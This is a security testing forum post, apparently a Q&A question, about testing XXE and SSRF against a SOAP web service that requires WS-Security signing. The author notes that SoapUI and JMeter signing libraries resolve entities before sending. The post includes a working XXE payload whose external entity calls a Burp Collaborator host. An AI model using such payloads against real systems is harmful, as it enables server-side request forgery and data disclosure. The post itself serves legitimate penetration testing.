# XXE in SOAP request when WS requires WS-Security

Tags: web-service, xxe

I am trying to test XXE and SSRF in SOAP webservice. Let say that my request looks like this:

```
<?xml version="1.0"?>
<!DOCTYPE order [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://277dke(...)so7h48ayyn.burpcollaborator.net" >
]>
<soap:Envelope xmlns:soap="http://www.w3.org/2001/12/soap-envelope" soap:encodingStyle="http://www.w3.org/2001/12/soap-encoding">
  <soap:Body xmlns:m="http://www.example.org/order">
     <foo>&xxe;</foo>
  </soap:Body>
</soap:Envelope>
```

The problem is that this web service requires WS-Security signature, and in SoapUI the library which signs my request tries to resolve entities instead of sending unresolved ones to the server, so there is no way to test this vulnerability. Moreover, the computer I use for testing has no Internet access, so when I check for SSRF this library tries to connect and gets a connection timeout, and returns an exception. Because this library ends execution with an exception the request is sent without WS-Security signature, so the server just rejects the request.

The same problem without a solution I found here: https://sourceforge.net/p/soapui/bugs/688/

I also tried to use JMeter, which has extention for WS-Security but with exactly the same result.
Example of connection error because of an attempt to resolve entity (SSRF attack).

[image]

Do you know any tools that can be used to test XXE in SOAP web service, where WS-Security is required?

Is it a correct behavior of libraries to sign requests with WS-Security to try to resolve external entities or it is just a vulnerability/bug in these libraries? Maybe WS-Security shouldn't sign XML with entities declaration? I can't find anything about this on the Internet and I have no idea how to make this test.

There are also other attacks on SOAP WS like XML Document Size Attack, examples here:
http://www.ws-attacks.org/XML_Document_Size_Attack, but is there any way to test this without "attacking" my tool which processes SOAP requests to make signatures using WS-Security?